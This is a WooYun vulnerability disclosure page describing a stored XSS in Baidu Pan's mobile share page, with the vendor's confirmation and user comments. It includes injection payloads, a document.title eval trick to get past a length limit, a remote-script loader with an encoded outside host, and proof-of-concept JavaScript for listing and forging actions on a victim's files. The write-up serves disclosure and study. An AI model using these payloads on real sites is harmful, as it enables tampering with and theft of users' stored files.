当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077970

漏洞标题:百度云网盘存储型XSS(可CSRF改名/共享/删除文件)

相关厂商:百度

漏洞作者: 超威蓝猫

提交时间:2014-09-30 21:36

修复时间:2014-11-14 21:38

公开时间:2014-11-14 21:38

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-30: 细节已通知厂商并且等待厂商处理中
2014-10-01: 厂商已经确认,细节仅向厂商公开
2014-10-11: 细节向核心白帽子及相关领域专家公开
2014-10-21: 细节向普通白帽子公开
2014-10-31: 细节向实习白帽子公开
2014-11-14: 细节向公众公开

简要描述:

今天是你的生日

详细说明:

这个问题我早在 http://wooyun.org/bugs/wooyun-2014-072520 就已经报告过,PC版页面已经修复了漏洞,但当时只是简单提了一下的手机版页面,没有修复,是百度不够重视吗?好那下面就看我如何一步一步放大危害。
参考 http://wooyun.org/bugs/wooyun-2014-072520 ,将QQ昵称改为如下代码后,在百度网盘登录并分享文件,

";};alert(1)//

得到链接 http://pan.baidu.com/s/1kTqTrzL 。
将浏览器UA修改为手机后,访问该链接会返回手机版页面,同时触发我们注入的JS代码。

sshot-2014-09-30-[1].png


是否存在一打开就是WAP版的链接呢? 我们百度一下 pan,baidu.com wap 看看:

sshot-2014-09-30-[2].png


这条链接打开就是WAP版的下载页,看来有戏了:

sshot-2014-09-30-[3].png


把链接中的uk与shareid参数修改为 http://pan.baidu.com/s/1kTqTrzL 对应的值,这两个参数在页面源码中都可以找到

sshot-2014-09-30-[4].png


构造出链接: http://pan.baidu.com/wap/link?shareid=1180545652&uk=1549176177

sshot-2014-09-30-[5].png


至此,我们可以实现无需特定UA即可执行我们的JS代码。
但紧接着又是个难点: 这个页面没有jQuery,无法用$.getScript()来加载远程JS,有PDC._load_js()用来加载远程JS,但我们的输出点在这个函数的前面

sshot-2014-09-30-[6].png

而QQ昵称最长为36字符,这怎么构造都没法加载JS嘛

"}";setTimeout('PDC._load_js()',2000)//   光是这就有39字符了..


经过与@Mramydnei 神的一阵谈笑风生,我也是瞬间爆炸: 页面标题可控,那何不eval(document.title)呢?

QQ截图20140930195227.png


sshot-2014-09-30-[7].png


可是现实很残酷:

sshot-2014-09-30-[8].png


//不能用了,又甩不掉这个该死的尾巴,不会JS的下场就是只能无脑试:

sshot-2014-09-30-[9].png


正当我脚进脑子正要放弃时,宇宙第一真神@Mramydnei 神一语道破天机:

alert(1);var a='_免费高速下载|百度云 网盘-分享无限制
"}";eval(document.title+"\x27")//


当时我就卧槽了: http://pan.baidu.com/wap/link?shareid=3111719745&uk=1532394789

sshot-2014-09-30-[10].png


突破了36字符限制这道坎,加载JS还不简单?将文件名修改为

document.body.appendChild(document.createElement('script')).src=String.fromCharCode(47,47,32473,46,112,119,47,50);var a='


看看效果: http://pan.baidu.com/wap/link?shareid=2326509483&uk=1532394789

sshot-2014-09-30-[11].png


成功执行恶意JS。
或许你会说,"辣鸡,拿不到BDUSS有啥用?" 对对对,接下来我们看看有啥用:
先给出一段POC

//bdstoken = document.documentElement.innerHTML.split("bdstoken=\u0022")[1].split("\u0022;FileUtils.mobileModel")[0];
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n < MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
function StateChange(){
if (xmlHttp.readyState == 4) {
a=JSON.parse(xmlHttp.responseText)
//document.write('<h3>your bdstoken: ' + bdstoken + '</h3></br>')
for (var i=0;i<a.list.length;i++){document.write(a.list[i].path +" "+ a.list[i].fs_id + "<br>");}
}
}
xmlHttp.onreadystatechange = StateChange;
xmlHttp.open("GET", "http://pan.baidu.com/api/list?num=100&page=1&dir=%2F&order=time&desc=1", true);
xmlHttp.send(null);

sshot-2014-09-30-[14].png

(为了上图方便 我这里直接在控制台执行了)
这是重命名文件所发送的HTTP请求

sshot-2014-09-30-[12].png


这是共享文件的请求

sshot-2014-09-30-[13].png


这是删除文件的请求

sshot-2014-09-30-[15].png


所以,只需要从当前页面(http://pan.baidu.com/wap/link?shareid=3111719745&uk=1532394789)取出victim的 bdstoken,通过XmlHttp发起get请求,从 http://pan.baidu.com/api/list?num=100&page=1&dir=%2F&order=time&desc=1 获取 fs_id 和 path 这两个值,就可以通过XmlHttp发POST请求,对victim网盘里的文件进行删除/共享/重命名等操作。

漏洞证明:

如上。
alert() http://pan.baidu.com/wap/link?shareid=1180545652&uk=1549176177
eval(alert()) http://pan.baidu.com/wap/link?shareid=3111719745&uk=1532394789
eval(loadJS()) http://pan.baidu.com/wap/link?shareid=2326509483&uk=1532394789
另外,pan,baidu.com 等同于 yun.baidu.com ,可以用以上链接在yun.baidu.com域下伪造请求,更多危害不再赘述。

sshot-2014-09-30-[16].png

修复方案:

求礼物 :v

版权声明:转载请注明来源 超威蓝猫@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-10-01 04:00

厂商回复:

感谢提交,我们已经通知业务部门处理此问题。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-30 21:38 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    也是你的忌日

  2. 2014-09-30 21:42 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @魇 假使这些完全无中生有的东西你再帮他说一遍,你等于你也有责任的吧

  3. 2014-09-30 21:46 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @超威蓝猫 你啊 别看gv了 跟我玩游戏去吧

  4. 2014-09-30 21:48 | backtrack丶yao ( 普通白帽子 | Rank:290 漏洞数:107 | "><img src=x onerror=alert(666666);> <im...)

    好厉害

  5. 2014-09-30 21:48 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @魇 你玩辣鸡游戏

  6. 2014-09-30 21:50 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    共享 这个牛逼啊

  7. 2014-09-30 21:52 | CoffeeSafe ( 普通白帽子 | Rank:142 漏洞数:37 )

    国庆送给百度的礼物吗? @超威蓝猫

  8. 2014-09-30 21:57 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    好厉害,关注中。。。

  9. 2014-09-30 22:07 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    好叼的样子,

  10. 2014-09-30 22:16 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    超级阳痿垃圾猫,我爱你

  11. 2014-09-30 22:26 | 阿萨帝 ( 实习白帽子 | Rank:91 漏洞数:68 | 不发礼物的索要联系方式都是耍流氓。)

    百度程序员国庆过不好了。

  12. 2014-10-01 08:05 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    蓝猫好猥琐啊

  13. 2014-10-01 17:38 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

    发个xss给那些库牛我就笑了。

  14. 2014-10-01 21:39 | 窝窝哥 ( 实习白帽子 | Rank:86 漏洞数:29 | 没WB啊啊啊啊!)

    百度的程序员假期就是因为你木有了

  15. 2014-11-15 17:20 | 何文阳 ( 路人 | Rank:0 漏洞数:1 | 我是小白 白帽)

    一个月了还没修?